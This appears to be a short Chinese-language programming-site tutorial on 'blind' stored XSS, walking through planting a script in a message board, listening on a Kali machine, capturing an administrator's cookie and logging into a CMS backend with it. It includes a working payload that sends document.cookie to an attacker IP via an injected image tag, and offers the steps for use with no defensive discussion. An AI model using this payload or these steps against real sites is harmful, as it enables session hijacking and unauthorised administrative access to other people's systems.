本文主要是介绍xss 盲打,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
XSS 盲打
为什么教盲打,是因为处于被动,要等待受害者触发
1.利用存储型XSS
先将代码写入留言。同时kali开启端口监听(下面IP是kali的)
<script>document.write(\'<img src=\"http://10.9.47.79/\'+document.cookie+\'\" width=0 height=0 border=0/>\')\;</script>
等待管理员访问,只要管理员访问留言板。
2.获取cms 网站后台管理员Cookie
我们就能获取到cookie信息。
3.攻击者登录后台
在控制台输入:
访问admin
成功进入
这篇关于xss 盲打的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
